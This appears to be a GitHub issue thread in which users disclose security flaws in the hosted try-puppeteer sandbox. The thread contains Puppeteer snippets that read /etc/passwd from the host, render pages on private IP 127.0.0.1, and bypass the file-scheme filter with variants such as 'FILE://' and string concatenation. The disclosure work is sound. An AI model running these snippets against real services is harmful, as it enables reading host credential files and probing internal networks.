Comments (8)
Thanks for the heads up! Chrome requires flags to allow access to file:///
from various web platform APIs. Puppeteer might want to do the same for security reasons.
In the meantime, I think we can intercept requests and prevent navigations to anything but https?://
urls.
from try-puppeteer.
Looks like it is still possible to get list of all your users.
If you run this code -
const browser = await puppeteer.launch();
const page = await browser.newPage();
await page.goto('file:///etc/passwd');
console.log(await page.content());
await page.screenshot({path: 'screenshot.png'});
await browser.close();
You'll get all users on the host.
from try-puppeteer.
@ebidel Looks like I'm also able to render pages on private IPs
const browser = await puppeteer.launch();
const page = await browser.newPage();
await page.goto('http://127.0.0.1:8080');
console.log(await page.content());
await page.screenshot({path: 'screenshot.png'});
await browser.close();
from try-puppeteer.
That's the https://backend-dot-try-puppeteer.appspot.com/ container. The app runs on the same vm and exposes 8080
as a webservice.
from try-puppeteer.
Well sure, I put that as quick example. One could imagine someone using the try-puppeteer code editor to scan the private IP address space looking for sensitive data.
from try-puppeteer.
@ebidel
I think you already know, we still can use "file:" scheme by below patterns.
- upper characters
→ 'FILE://etc/passwd' - cantaining unintended「.」
→ 'file:/./etc/passwd' - string concatenation
→ 'fi'+'le://etc/passwd'
thank you.
from try-puppeteer.
@ebidel can you provide a security contact email ? It would be great to send an email with more information on a variant of this issue that could have higher risks than the one provided here (and that should be fixed asap).
from try-puppeteer.
from try-puppeteer.
Related Issues (20)
- Hosting services HOT 1
- Shareable link HOT 1
- Broken flexbox layout in Firefox/Edge HOT 3
- TypeError: Failed to fetch HOT 1
- Broken example: proxy.js HOT 2
- Editor typeface
- page.accessibility not working on https://try-puppeteer.appspot.com/ HOT 1
- Cannot scroll to the bottom HOT 1
- search.js not working on https://try-puppeteer.appspot.com/ HOT 1
- Error: net::ERR_SSL_VERSION_OR_CIPHER_MISMATCH
- none
- try-puppeteer on Cloud Run v2.0.0 HOT 4
- OpenShift
- Fix backend dockerfile
- Page content log gets trimmed
- Example search.js does not work
- PSA: Taking down try-puppeteer.appspot.com HOT 1
- dependencies: update puppeteer version
- https://try-puppeteer.appspot.com -> not working ( Error 404 ) HOT 2
- Broken link HOT 1
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from try-puppeteer.